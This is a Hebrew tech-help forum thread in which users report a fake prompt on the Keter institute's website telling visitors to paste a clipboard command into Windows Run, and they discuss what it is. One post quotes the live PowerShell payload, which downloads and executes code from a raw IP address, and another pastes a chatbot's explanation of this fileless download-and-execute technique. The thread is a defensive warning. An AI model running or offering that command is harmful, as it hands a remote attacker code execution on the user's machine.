דילוג לתוכן
  • חוקי הפורום
  • פופולרי
  • לא נפתר
  • משתמשים
  • חיפוש גוגל בפורום
  • צור קשר
עיצובים
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • ברירת מחדל (ללא עיצוב (ברירת מחדל))
  • ללא עיצוב (ברירת מחדל)
כיווץ
מתמחים טופ
  1. דף הבית
  2. מחשבים וטכנולוגיה
  3. עזרה הדדית - מחשבים וטכנולוגיה
  4. בעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).

בעיה | הונאה באתר מכון כת"ר (לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה).

מתוזמן נעוץ נעול הועבר עזרה הדדית - מחשבים וטכנולוגיה
25 פוסטים 9 כותבים 202 צפיות 9 עוקבים
  • מהישן לחדש
  • מהחדש לישן
  • הכי הרבה הצבעות
תגובה
  • תגובה כנושא
התחברו כדי לפרסם תגובה
נושא זה נמחק. רק משתמשים עם הרשאות מתאימות יוכלו לצפות בו.
  • ה מנותק
    ה מנותק
    החכם התם
    כתב נערך לאחרונה על ידי החכם התם
    #1

    עכשיו נכנסתי לאתר של מכון כתר https://keter.org.il/חשש-ריבית-בחוזה-לקניית-דירה-במחיר-למשת/

    וזה מה שאני רואה : 422757c8-12a2-48e7-b283-69644c1d9aed-image.png

    למותר לציין שהאתר הזה הוא אתר אמין ואולי זה משהו חיצוני שהשתלט.

    מ MGM IVRM cfopuserC 4 תגובות תגובה אחרונה
    1
    • ה החכם התם

      עכשיו נכנסתי לאתר של מכון כתר https://keter.org.il/חשש-ריבית-בחוזה-לקניית-דירה-במחיר-למשת/

      וזה מה שאני רואה : 422757c8-12a2-48e7-b283-69644c1d9aed-image.png

      למותר לציין שהאתר הזה הוא אתר אמין ואולי זה משהו חיצוני שהשתלט.

      מ מנותק
      מ מנותק
      מומחה123
      כתב נערך לאחרונה על ידי
      #2

      @החכם-התם מעניין מה כתוב בפקודה שצריך להדביק
      אולי תנסה להעתיק?

      תגובה 1 תגובה אחרונה
      0
      • י מנותק
        י מנותק
        יאיר אלייצור
        כתב נערך לאחרונה על ידי
        #3
        פוסט זה נמחק!
        מ ה 2 תגובות תגובה אחרונה
        0
        • י יאיר אלייצור

          פוסט זה נמחק!

          מ מנותק
          מ מנותק
          מומחה123
          כתב נערך לאחרונה על ידי
          #4

          @יאיר-אלייצור האתר לא קשור אליו כמובן

          תגובה 1 תגובה אחרונה
          0
          • י יאיר אלייצור

            פוסט זה נמחק!

            ה מנותק
            ה מנותק
            החכם התם
            כתב נערך לאחרונה על ידי
            #5

            @יאיר-אלייצור הכנסתי קישור .
            זה לא האתר שלו.

            מ תגובה 1 תגובה אחרונה
            0
            • ה החכם התם

              @יאיר-אלייצור הכנסתי קישור .
              זה לא האתר שלו.

              מ מנותק
              מ מנותק
              מומחה123
              כתב נערך לאחרונה על ידי
              #6

              @החכם-התם כתב בבעיה | הונאה באתר מכון כת"ר:

              הכנסתי קישור

              אצלי האתר מופיע רגיל לגמרי

              תגובה 1 תגובה אחרונה
              0
              • י מנותק
                י מנותק
                יאיר אלייצור
                כתב נערך לאחרונה על ידי
                #7

                גם אצלי

                מ תגובה 1 תגובה אחרונה
                0
                • י יאיר אלייצור

                  גם אצלי

                  מ מנותק
                  מ מנותק
                  מומחה123
                  כתב נערך לאחרונה על ידי
                  #8

                  @יאיר-אלייצור אולי זה וירוס אצלך במחשב?

                  תגובה 1 תגובה אחרונה
                  0
                  • ה החכם התם

                    עכשיו נכנסתי לאתר של מכון כתר https://keter.org.il/חשש-ריבית-בחוזה-לקניית-דירה-במחיר-למשת/

                    וזה מה שאני רואה : 422757c8-12a2-48e7-b283-69644c1d9aed-image.png

                    למותר לציין שהאתר הזה הוא אתר אמין ואולי זה משהו חיצוני שהשתלט.

                    MGM IVRM מנותק
                    MGM IVRM מנותק
                    MGM IVR
                    מדריכים
                    כתב נערך לאחרונה על ידי
                    #9

                    @החכם-התם לא לעשות כמובן, היה פה שרשור על זה לא מזמן, זה לכאורה כבר העתיק לך משהו למחשב, ומבקש שתדביק אותו ב הפעלה של ווינדוס

                    אשמח אם תוכל לשלוח לי בפרטי או פה תחת אזהרה מתאימה את ההדבקה שלך, שנראה מה הוא רצה לעשות

                    J ה 2 תגובות תגובה אחרונה
                    0
                    • MGM IVRM MGM IVR

                      @החכם-התם לא לעשות כמובן, היה פה שרשור על זה לא מזמן, זה לכאורה כבר העתיק לך משהו למחשב, ומבקש שתדביק אותו ב הפעלה של ווינדוס

                      אשמח אם תוכל לשלוח לי בפרטי או פה תחת אזהרה מתאימה את ההדבקה שלך, שנראה מה הוא רצה לעשות

                      J מנותק
                      J מנותק
                      jc324118983
                      כתב נערך לאחרונה על ידי jc324118983
                      #10

                      @MGM-IVR זה מה שהו מעתיק powershell -c iex(irm 158.94.208.86 -UseBasicParsing) זהירות לא ברור מה זה

                      מ תגובה 1 תגובה אחרונה
                      0
                      • י מנותק
                        י מנותק
                        יאיר אלייצור
                        כתב נערך לאחרונה על ידי
                        #11

                        תזהיר באותיות קידוש לבנה

                        תגובה 1 תגובה אחרונה
                        0
                        • J jc324118983

                          @MGM-IVR זה מה שהו מעתיק powershell -c iex(irm 158.94.208.86 -UseBasicParsing) זהירות לא ברור מה זה

                          מ מנותק
                          מ מנותק
                          מומחה123
                          כתב נערך לאחרונה על ידי
                          #12

                          @jc324118983 כתב בבעיה | הונאה באתר מכון כת"ר:

                          זה מה שהו מעתיק

                          אז כנראה זה לא וירוס אצל המחשב של @יאיר-אלייצור
                          מעניין למה זה קורה רק אצלכם

                          תגובה 1 תגובה אחרונה
                          0
                          • es0583292679E מנותק
                            es0583292679E מנותק
                            es0583292679
                            כתב נערך לאחרונה על ידי
                            #13

                            תעלה לכאן את הפקודה (כמובן עם אזהרה נוספת שלא להפעיל אותה), ננסה אולי לנתח אותה ולפרסם איה"י, אם יעלה בידינו משהו.

                            למותר לציין שהאתר הזה הוא אתר אמין ואולי זה משהו חיצוני שהתשלט, וכן למותר לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה (@החכם-התם אשמח אם יציינו את זה בשם הנושא ובנושא עצמו, מאחר והענין גורר תופעות לא נעימות).

                            לקבוצה הכי מעניינת >> https://did.li/in1Nf

                            מ תגובה 1 תגובה אחרונה
                            2
                            • es0583292679E es0583292679

                              תעלה לכאן את הפקודה (כמובן עם אזהרה נוספת שלא להפעיל אותה), ננסה אולי לנתח אותה ולפרסם איה"י, אם יעלה בידינו משהו.

                              למותר לציין שהאתר הזה הוא אתר אמין ואולי זה משהו חיצוני שהתשלט, וכן למותר לציין שמכון כת"ר אינו קשור כלל למכון כתר תורה (@החכם-התם אשמח אם יציינו את זה בשם הנושא ובנושא עצמו, מאחר והענין גורר תופעות לא נעימות).

                              מ מנותק
                              מ מנותק
                              מומחה123
                              כתב נערך לאחרונה על ידי
                              #14

                              @es0583292679 כתב בבעיה | הונאה באתר מכון כת"ר:

                              תעלה לכאן את הפקודה

                              הוא העלה כבר קודם
                              https://mitmachim.top/post/1130533

                              תגובה 1 תגובה אחרונה
                              0
                              • J מנותק
                                J מנותק
                                jc324118983
                                כתב נערך לאחרונה על ידי
                                #15

                                צריך לבדוק את הIP בלי הרצה (חסום לי בנטפרי)

                                תגובה 1 תגובה אחרונה
                                0
                                • MGM IVRM MGM IVR

                                  @החכם-התם לא לעשות כמובן, היה פה שרשור על זה לא מזמן, זה לכאורה כבר העתיק לך משהו למחשב, ומבקש שתדביק אותו ב הפעלה של ווינדוס

                                  אשמח אם תוכל לשלוח לי בפרטי או פה תחת אזהרה מתאימה את ההדבקה שלך, שנראה מה הוא רצה לעשות

                                  ה מנותק
                                  ה מנותק
                                  החכם התם
                                  כתב נערך לאחרונה על ידי
                                  #16

                                  @MGM-IVR הוא כבר לא מבקש ממני שוב אחרי כמה ריענונים של האתר.

                                  תגובה 1 תגובה אחרונה
                                  0
                                  • בנימין מחשביםב מחובר
                                    בנימין מחשביםב מחובר
                                    בנימין מחשבים
                                    כתב נערך לאחרונה על ידי בנימין מחשבים
                                    #17

                                    @cfopuser @מתכנת-חובב @מישהו12

                                    סליחה על התיוג!

                                    השרשור המקורי

                                    תגובה 1 תגובה אחרונה
                                    1
                                    • מ מנותק
                                      מ מנותק
                                      מומחה123
                                      כתב נערך לאחרונה על ידי מומחה123
                                      #18

                                      זה מה שג'מיני כותב:

                                      ||הפקודה הזו אכן נראית כמו פקודה זדונית קלאסית, והיא משתמשת בטכניקה מוכרת מאוד בעולם אבטחת המידע הנקראת "Download and Execute" (הורדה והפעלה) או הפעלת "Fileless Malware" (תוכנה זדונית ללא קובץ).

                                      הנה פירוט טכני של מה שהפקודה הזאת עושה למחשב, צעד אחר צעד:

                                      powershell -c: החלק הזה פותח את שורת הפקודה של PowerShell (כלי ניהול ואוטומציה חזק של חלונות) ומורה לו להריץ את רצף הפקודות (c- הוא קיצור ל-Command) שמופיע מיד אחריו.

                                      iex: זהו קיצור (Alias) לפקודה Invoke-Expression. תפקידה לקחת טקסט פשוט ולהריץ אותו כקוד תוכנה. תוקפים משתמשים בפקודה זו בתדירות גבוהה משום שהיא מאפשרת הרצת קוד זדוני ישירות בזיכרון המחשב (RAM), מבלי לשמור אף קובץ על הדיסק הקשיח. הדבר מקשה מאוד על תוכנות אנטי-וירוס מסורתיות לזהות את הפעולה.

                                      irm 158.94.208.86: זהו קיצור לפקודה Invoke-RestMethod. הפקודה יוצרת קשר עם השרת המרוחק שיושב בכתובת ה-IP שצוינה (158.94.208.86) ומורידה ממנו תוכן. במקרה של תקיפה, התוכן הזה יהיה הקוד הזדוני האמיתי (ה-Payload).

                                      -UseBasicParsing: פרמטר שמורה ל-PowerShell להוריד את התוכן תוך שימוש במנגנון רשת בסיסי, מבלי להסתמך על מנוע של Internet Explorer. תוקפים מוסיפים את זה כדי "ללכת על בטוח" ולהבטיח שההורדה תצליח גם במחשבים (למשל שרתים ישנים) שבהם דפדפן לא הוגדר או לא הופעל מעולם.||

                                      תגובה 1 תגובה אחרונה
                                      -1
                                      • ה מנותק
                                        ה מנותק
                                        המלאך
                                        כתב נערך לאחרונה על ידי המלאך
                                        #19

                                        נסה להיכנס מדפדפן אחר.
                                        ואז נוכל לדעת אם זה [הקוד הזדוני] פריצה לאתר או תוסף בדפדפן.
                                        @יאיר-אלייצור זה מדפדפן אחר?
                                        אם זה היה פריצה לאתר זה היה אמור להופיע לכולם...

                                        תגובה 1 תגובה אחרונה
                                        0
                                        • י מנותק
                                          י מנותק
                                          יאיר אלייצור
                                          כתב נערך לאחרונה על ידי יאיר אלייצור
                                          #20

                                          צילום מסך 2026-03-30 135105.png

                                          תגובה 1 תגובה אחרונה
                                          0

                                          • התחברות

                                          • אין לך חשבון עדיין? הרשמה

                                          • התחברו או הירשמו כדי לחפש.
                                          • פוסט ראשון
                                            פוסט אחרון
                                          0
                                          • חוקי הפורום
                                          • פופולרי
                                          • לא נפתר
                                          • משתמשים
                                          • חיפוש גוגל בפורום
                                          • צור קשר